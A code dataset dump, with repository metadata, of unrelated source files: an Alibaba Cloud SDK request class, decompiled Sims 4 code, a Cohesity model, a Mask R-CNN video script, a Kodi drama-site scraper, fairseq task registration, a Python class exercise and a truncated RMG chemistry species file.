blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
400047e04233a252d0fb35fe927e52d1a4db4639 | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-sas/aliyunsdksas/request/v20181203/PublicSyncAndCreateImageScanTaskRequest.py | c9bf921c804bb10a29eeaa44219a878d31ae55d6 | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 1,646 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdksas.endpoint import endpoint_data
class PublicSyncAndCreateImageScanTaskRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Sas', '2018-12-03', 'PublicSyncAndCreateImageScanTask')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Images(self): # String
return self.get_query_params().get('Images')
def set_Images(self, Images): # String
self.add_query_param('Images', Images)
def get_SourceIp(self): # String
return self.get_query_params().get('SourceIp')
def set_SourceIp(self, SourceIp): # String
self.add_query_param('SourceIp', SourceIp)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
fff0e6483247918bc0215838062d0a78d3f2aa30 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /Scripts/simulation/venues/karaoke_venue/karaoke_duet_individualsim_situation.py | 3c1e72aaa8387818454955a79a9a54b702283a3c | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,245 | py | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\venues\karaoke_venue\karaoke_duet_individualsim_situation.py
# Compiled at: 2016-07-16 01:45:12
# Size of source mod 2**32: 2320 bytes
from sims4.tuning.instances import lock_instance_tunables
from situations.bouncer.bouncer_types import BouncerExclusivityCategory
from situations.situation import Situation
from situations.situation_complex import SituationState, TunableSituationJobAndRoleState, SituationComplexCommon, SituationStateData
from situations.situation_types import SituationCreationUIOption
class KaraokeDuetState(SituationState):
pass
class KaraokeDuetSimSituation(SituationComplexCommon):
INSTANCE_TUNABLES = {'karaoke_singer_job': TunableSituationJobAndRoleState(description='\n The default job and role for a Sim in this situation. They only\n have one role, so this is what will be given for them to do.\n ')}
REMOVE_INSTANCE_TUNABLES = Situation.NON_USER_FACING_REMOVE_INSTANCE_TUNABLES
def __init__(self, *arg, **kwargs):
(super().__init__)(*arg, **kwargs)
self._duet_sim = None
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.karaoke_singer_job.job, cls.karaoke_singer_job.role_state)]
def _on_set_sim_job(self, sim, job_type):
super()._on_set_sim_job(sim, job_type)
self._duet_sim = sim
@classmethod
def default_job(cls):
return cls.karaoke_singer_job.job
def start_situation(self):
super().start_situation()
self._change_state(KaraokeDuetState())
def sim_of_interest(self, sim_info):
if self._duet_sim is not None:
if self._duet_sim.sim_info is sim_info:
return True
return False
@classmethod
def _states(cls):
return (SituationStateData(1, KaraokeDuetState),)
lock_instance_tunables(KaraokeDuetSimSituation, exclusivity=(BouncerExclusivityCategory.NORMAL),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE),
_implies_greeted_status=False) | [
"cristina.caballero2406@gmail.com"
] | cristina.caballero2406@gmail.com |
a9e79ced7f79f55849f13742310819e73a64dfb1 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/cassandra_protection_source.py | c79152ddb527ab066e9f0f7c688e1e1fb21e2b99 | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 3,340 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
import cohesity_management_sdk.models.cassandra_cluster
import cohesity_management_sdk.models.cassandra_keyspace
class CassandraProtectionSource(object):
"""Implementation of the 'CassandraProtectionSource' model.
Specifies an Object representing Cassandra.
Attributes:
cluster_info (CassandraCluster): Information of a Cassandra cluster,
only valid for an entity of type kCluster.
keyspace_info (CassandraKeyspace): Information of a cassandra
keyspapce, only valid for an entity of type kKeyspace.
name (string): Specifies the instance name of the Cassandra entity.
mtype (TypeCassandraProtectionSourceEnum): Specifies the type of the
managed Object in Cassandra Protection Source. Replication strategy
options for a keyspace. 'kCluster' indicates a Cassandra cluster
distributed over several physical nodes. 'kKeyspace' indicates a
Keyspace enclosing one or more tables. 'kTable' indicates a Table
in the Cassandra environment.
uuid (string): Specifies the UUID for the Cassandra entity. Note : For
each entity an ID unique within top level entity should be assigned
by imanis backend. Example, UUID for a table can be the string
<keyspace_name>.<table_name>
"""
# Create a mapping from Model property names to API property names
_names = {
"cluster_info":'clusterInfo',
"keyspace_info":'keyspaceInfo',
"name":'name',
"mtype":'type',
"uuid":'uuid',
}
def __init__(self,
cluster_info=None,
keyspace_info=None,
name=None,
mtype=None,
uuid=None,
):
"""Constructor for the CassandraProtectionSource class"""
# Initialize members of the class
self.cluster_info = cluster_info
self.keyspace_info = keyspace_info
self.name = name
self.mtype = mtype
self.uuid = uuid
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
cluster_info = cohesity_management_sdk.models.cassandra_cluster.CassandraCluster.from_dictionary(dictionary.get('clusterInfo')) if dictionary.get('clusterInfo') else None
keyspace_info = cohesity_management_sdk.models.cassandra_keyspace.CassandraKeyspace.from_dictionary(dictionary.get('keyspaceInfo')) if dictionary.get('keyspaceInfo') else None
name = dictionary.get('name')
mtype = dictionary.get('type')
uuid = dictionary.get('uuid')
# Return an object of this model
return cls(
cluster_info,
keyspace_info,
name,
mtype,
uuid
) | [
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c57bd4cdfecc79a54141289af0ac284ba85f3d3b | bc42b7700ccc0014282f943a20f968dc2172c4c5 | /Day6 : Mask-RCNN on Videos/mask_rcnn_videos.py | 6b1dbe56385fa9916b3bc62811e774e2ed2e25bb | [] | no_license | vgaurav3011/100-days-of-ML-Code-2 | 1a4b6836ac1b378caeed63a253a3d2b71bada32f | 339992040d807f1c382c858b53e35ed2699518d9 | refs/heads/master | 2022-04-27T07:30:10.797553 | 2020-04-22T07:37:53 | 2020-04-22T07:37:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,340 | py | import numpy as np
# import argparse
import random
import time
import cv2
import imutils
import os
mask_rcnn = ''
visualize = False
confi = 0.5
threshold = 0.3
#defining the labels path and
# loading the coco class labels
labelsPath = 'assets/object_detection_classes_coco.txt'
# f = open("demofile.txt", "r")
LABELS = open(labelsPath , ).read().strip().split("\n")
# initializing a list of colors to represent each class label
np.random.seed(42)
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),
dtype="uint8")
# loading the model
weightsPath = 'assets/frozen_inference_graph.pb'
configPath = 'assets/mask_rcnn_inception_v2_coco_2018_01_28.pbtxt'
print("loading the model........")
net = cv2.dnn.readNetFromTensorflow(weightsPath, configPath)
video_dir = 'videos/2.mp4'
vs = cv2.VideoCapture(video_dir)
writer = None
# frame count
try:
prop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \
else cv2.CAP_PROP_FRAME_COUNT
total = int(vs.get(prop))
print("{} total frames in video".format(total))
except:
print("could not determine # of frames in video")
total = -1
# loop over frames from the video file stream
while True:
# read the next frame from the file
(grabbed, frame) = vs.read()
# if the frame was not grabbed, then we have reached the end
# of the stream
if not grabbed:
break
# construct a blob from the input frame and then perform a
# forward pass of the Mask R-CNN, giving us (1) the bounding box
# coordinates of the objects in the image along with (2) the
# pixel-wise segmentation for each specific object
blob = cv2.dnn.blobFromImage(frame, swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
(boxes, masks) = net.forward(["detection_out_final",
"detection_masks"])
end = time.time()
# loop over the number of detected objects
for i in range(0, boxes.shape[2]):
# extract the class ID of the detection along with the
# confidence (i.e., probability) associated with the
# prediction
classID = int(boxes[0, 0, i, 1])
confidence = boxes[0, 0, i, 2]
# filter out weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > confi:
# scale the bounding box coordinates back relative to the
# size of the frame and then compute the width and the
# height of the bounding box
(H, W) = frame.shape[:2]
box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H])
(startX, startY, endX, endY) = box.astype("int")
boxW = endX - startX
boxH = endY - startY
# extract the pixel-wise segmentation for the object,
# resize the mask such that it's the same dimensions of
# the bounding box, and then finally threshold to create
# a *binary* mask
mask = masks[i, classID]
mask = cv2.resize(mask, (boxW, boxH),
interpolation=cv2.INTER_NEAREST)
mask = (mask > threshold)
# extract the ROI of the image but *only* extracted the
# masked region of the ROI
roi = frame[startY:endY, startX:endX][mask]
# grab the color used to visualize this particular class,
# then create a transparent overlay by blending the color
# with the ROI
color = COLORS[classID]
blended = ((0.4 * color) + (0.6 * roi)).astype("uint8")
# store the blended ROI in the original frame
frame[startY:endY, startX:endX][mask] = blended
# draw the bounding box of the instance on the frame
color = [int(c) for c in color]
cv2.rectangle(frame, (startX, startY), (endX, endY),
color, 2)
# draw the predicted label and associated probability of
# the instance segmentation on the frame
text = "{}: {:.4f}".format(LABELS[classID], confidence)
cv2.putText(frame, text, (startX, startY - 5),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
# check if the video writer is None
if writer is None:
# initialize our video writer
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter('output/output', fourcc, 30,
(frame.shape[1], frame.shape[0]), True)
# some information on processing single frame
if total > 0:
elap = (end - start)
print("[INFO] single frame took {:.4f} seconds".format(elap))
print("[INFO] estimated total time to finish: {:.4f}".format(
elap * total))
# write the output frame to disk
writer.write(frame)
# release the file pointers
print("[INFO] cleaning up...")
writer.release()
vs.release()
| [
"you@example.com"
] | you@example.com |
91203a59c466da8892ee586d81d8a79b679862ea | 675afeffeda042e39c2bf7453d0f9ee890e7fad0 | /backend/behavior/apps.py | a67424e3f6f777f3e2975ea22c28f86f5a5abe2a | [] | no_license | crowdbotics-apps/behavior-management-25412 | fd4e20d5201cd861f59cc87252a7a7c518ba1d8d | 18dc5330650268f54aa8021c013a71cfdc6eabac | refs/heads/master | 2023-04-04T07:36:17.045282 | 2021-04-08T13:58:10 | 2021-04-08T13:58:10 | 353,739,891 | 0 | 0 | null | 2021-04-08T13:58:11 | 2021-04-01T15:12:20 | Python | UTF-8 | Python | false | false | 91 | py | from django.apps import AppConfig
class BehaviorConfig(AppConfig):
name = "behavior"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
db837659d0416abcd64e830e6dd62418e2d5388a | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_scrubs/ko/drama4u.py | 1cb35e3200c5d19d766ec5ba2e8f07258beb26e7 | [
"Beerware"
] | permissive | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 5,121 | py | # -*- coding: UTF-8 -*-
# -Cleaned and Checked on 11-23-2018 by JewBMX in Scrubs.
# Only browser checks for active domains.
import re,urllib,urlparse
from resources.lib.modules import cleantitle,client,directstream,source_utils,dom_parser
class source:
def __init__(self):
self.priority = 1
self.language = ['ko']
self.domains = ['4udrama.com'] # old drama4u.us
self.base_link = 'https://4udrama.com'
self.search_link = '/search?s=%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search([localtitle] + source_utils.aliases_to_array(aliases))
if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases))
return self.__get_episode_link(url)
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases))
if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases))
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
return self.__get_episode_link(url, episode)
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'tab-pane'})
r = dom_parser.parse_dom(r, 'iframe', req='src')
r = [i.attrs['src'] for i in r]
for i in r:
try:
if 'drama4u' in i or 'k-vid' in i:
r = client.request(i, referer=url)
r = re.findall('''var\s*source\s*=\s*\[({.*?})\]\s*;''', r)[0]
i = [(match[1], match[0]) for match in re.findall('''["']?label\s*["']?\s*[:=]\s*["']?([^"',]+)["']?(?:[^}\]]+)["']?\s*file\s*["']?\s*[:=,]?\s*["']([^"']+)''', r, re.DOTALL)]
i += [(match[0], match[1]) for match in re.findall('''["']?\s*file\s*["']?\s*[:=,]?\s*["']([^"']+)(?:[^}>\]]+)["']?\s*label\s*["']?\s*[:=]\s*["']?([^"',]+)''', r, re.DOTALL)]
r = [(x[0].replace('\/', '/'), source_utils.label_to_quality(x[1])) for x in i]
for u, q in list(set(r)):
try:
tag = directstream.googletag(u)
if tag:
sources.append({'source': 'gvideo', 'quality': tag[0].get('quality', 'SD'), 'language': 'ko', 'url': u, 'direct': True, 'debridonly': False})
else:
sources.append({'source': 'CDN', 'quality': q, 'language': 'ko', 'url': u, 'direct': True, 'debridonly': False})
except:
pass
else:
valid, host = source_utils.is_host_valid(i, hostDict)
if not valid: continue
sources.append({'source': host, 'quality': 'SD', 'language': 'ko', 'url': i, 'direct': False, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
def __search(self, titles):
try:
query = self.search_link % urllib.quote_plus(cleantitle.query(titles[0]))
query = urlparse.urljoin(self.base_link, query)
t = [cleantitle.get(i) for i in set(titles) if i]
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'id': 'container-search'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'movie-cat'})
r = dom_parser.parse_dom(r, 'h4', attrs={'class': 'title'})
r = dom_parser.parse_dom(r, 'a', req=['title', 'href'])
r = [(i.attrs['href'], i.attrs['title']) for i in r]
r = [(i[0]) for i in r if cleantitle.get(i[1]) in t][0]
return source_utils.strip_domain(r)
except:
return
def __get_episode_link(self, url, episode='1'):
try:
if not url:
return
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
r = dom_parser.parse_dom(r, 'div', attrs={'id': 'list-espisode'})
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'movie-item-espisode'})
r = dom_parser.parse_dom(r, 'a', req='href')
r = [(i.attrs['href'], i.content) for i in r]
r = [(i[0], re.findall('EP\s*(\d+)$', i[1])) for i in r]
r = [i[0] for i in r if i[1] and int(i[1][0]) == int(episode)][0]
return source_utils.strip_domain(r)
except:
return
| [
"github+github@github.github"
] | github+github@github.github |
5cb5741e1ccf992fab5d6962ca406c0996b96972 | 5e8342e4f6e48688f4a0079310e8f0b5e5386044 | /POO/Alumnos/profesor.py | 7aa8c1fac4b48d3b71088e1d6df86f077606537f | [] | no_license | fernado1981/python_ | 27a154406b5fba7e18da418bc5f75c58f3ccc24f | 7d846cd332405464fa14707ea3f2286a918fc9de | refs/heads/master | 2023-02-15T19:30:02.257345 | 2021-01-21T10:35:46 | 2021-01-21T10:35:46 | 277,186,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,272 | py | class profesor:
limit = 3
def __init__(self, alumnado, name):
self.alumnos = alumnado
self.name = name
def aprobar(self):
if self.name in self.alumnos:
for c, v in self.alumnos.items():
if c == self.name:
v['aprobar'] = True
def suspender(self):
for c, v in self.alumnos.items():
if c == self.name:
v['aprobar'] = False
def amonestaciones(self, num):
for c, v in self.alumnos.items():
if c == self.name:
v['amonestaciones'] = num
if v['amonestaciones'] >= self.limit:
self.suspender()
def desamonestar(self, num):
for c, v in self.alumnos.items():
if c == self.name:
v['amonestaciones'] -= num
if v['amonestaciones'] < 3:
v['aprobar'] = True
def verAlumnado(self):
for c,v in self.alumnos.items():
print(c, v)
def suspensos(self):
for c,v in self.alumnos.items():
if not v['aprobar']:
print(c,v)
def aprobados(self):
for c, v in self.alumnos.items():
if v['aprobar']:
print(c, v)
| [
"fernando.manrique.villanueva@gmail.com"
] | fernando.manrique.villanueva@gmail.com |
14559afff0cea58f13cdd39a5f7e9f4982efc821 | 246ec8733c63a28518160af8fc9e21ae04f76649 | /fairseq/tasks/__init__.py | 92f9d53190d0779fc407d6a8cdfd932a63079362 | [
"MIT"
] | permissive | fyabc/BT4MolGen | 80050dc24031753fa3052ef60a5bea170d9d9c56 | 05d161ae9a7dbbcc3c95c71417d5e7f92ed0572c | refs/heads/master | 2023-05-29T01:38:36.614479 | 2021-06-18T15:56:13 | 2021-06-18T15:56:13 | 370,941,322 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,494 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import importlib
import os
from .fairseq_task import FairseqTask
TASK_REGISTRY = {}
TASK_CLASS_NAMES = set()
def setup_task(args, **kwargs):
return TASK_REGISTRY[args.task].setup_task(args, **kwargs)
def register_task(name):
"""
New tasks can be added to fairseq with the
:func:`~fairseq.tasks.register_task` function decorator.
For example::
@register_task('classification')
class ClassificationTask(FairseqTask):
(...)
.. note::
All Tasks must implement the :class:`~fairseq.tasks.FairseqTask`
interface.
Please see the
Args:
name (str): the name of the task
"""
def register_task_cls(cls):
if name in TASK_REGISTRY:
raise ValueError('Cannot register duplicate task ({})'.format(name))
if not issubclass(cls, FairseqTask):
raise ValueError('Task ({}: {}) must extend FairseqTask'.format(name, cls.__name__))
if cls.__name__ in TASK_CLASS_NAMES:
raise ValueError('Cannot register task with duplicate class name ({})'.format(cls.__name__))
TASK_REGISTRY[name] = cls
TASK_CLASS_NAMES.add(cls.__name__)
return cls
return register_task_cls
# automatically import any Python files in the tasks/ directory
tasks_dir = os.path.dirname(__file__)
for file in os.listdir(tasks_dir):
path = os.path.join(tasks_dir, file)
if not file.startswith('_') and (file.endswith('.py') or os.path.isdir(path)):
task_name = file[:file.find('.py')] if file.endswith('.py') else file
importlib.import_module('fairseq.tasks.' + task_name)
# expose `task_parser` for sphinx
if task_name in TASK_REGISTRY:
parser = argparse.ArgumentParser(add_help=False)
group_task = parser.add_argument_group('Task name')
# fmt: off
group_task.add_argument('--task', metavar=task_name,
help='Enable this task with: ``--task=' + task_name + '``')
# fmt: on
group_args = parser.add_argument_group('Additional command-line arguments')
TASK_REGISTRY[task_name].add_args(group_args)
globals()[task_name + '_parser'] = parser
def get_task(name):
return TASK_REGISTRY[name]
| [
"fyabc@mail.ustc.edu.cn"
] | fyabc@mail.ustc.edu.cn |
dd82e1fdbc12fe353273aa0cb0856e221ae8ae1f | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /1heptane/pdep/network80_2.py | ba991ad5df7eb1552abf800c3f4a2b3950a8c035 | [] | no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 17,219 | py | species(
label = 'CH2OH(24)',
structure = SMILES('[CH2]O'),
E0 = (-28.7184,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,3003.59,4000],'cm^-1')),
HinderedRotor(inertia=(0.057913,'amu*angstrom^2'), symmetry=1, barrier=(25.9304,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (31.0339,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3467.15,'J/mol'), sigma=(3.69,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.47834,-0.0013507,2.78485e-05,-3.64869e-08,1.47907e-11,-3500.73,3.30913], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[5.09314,0.00594761,-2.06497e-06,3.23008e-10,-1.88126e-14,-4034.1,-1.84691], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-28.7184,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), label="""CH2OH""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'CH3O(25)',
structure = SMILES('C[O]'),
E0 = (10.474,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (31.0339,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3467.15,'J/mol'), sigma=(3.69,'angstroms'), dipoleMoment=(1.7,'De'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.71181,-0.00280463,3.76551e-05,-4.73072e-08,1.86588e-11,1295.7,6.57241], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.75779,0.00744142,-2.69705e-06,4.38091e-10,-2.63537e-14,378.112,-1.9668], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(10.474,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), label="""CH3O""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH2O(15)',
structure = SMILES('C=O'),
E0 = (-119.055,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (30.026,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4140.62,'J/mol'), sigma=(3.59,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.79372,-0.00990833,3.7322e-05,-3.79285e-08,1.31773e-11,-14379.2,0.602798], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.16953,0.00619321,-2.25056e-06,3.65976e-10,-2.20149e-14,-14548.7,6.04208], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-119.055,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH2O""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'OH(5)',
structure = SMILES('[OH]'),
E0 = (28.372,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3287.46],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (17.0073,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.4858,0.00133397,-4.70043e-06,5.64379e-09,-2.06318e-12,3411.96,1.99788], Tmin=(100,'K'), Tmax=(1005.25,'K')), NASAPolynomial(coeffs=[2.88225,0.00103869,-2.35652e-07,1.40229e-11,6.34581e-16,3669.56,5.59053], Tmin=(1005.25,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.372,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CH2(19)',
structure = SMILES('[CH2]'),
E0 = (381.563,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1032.72,2936.3,3459],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
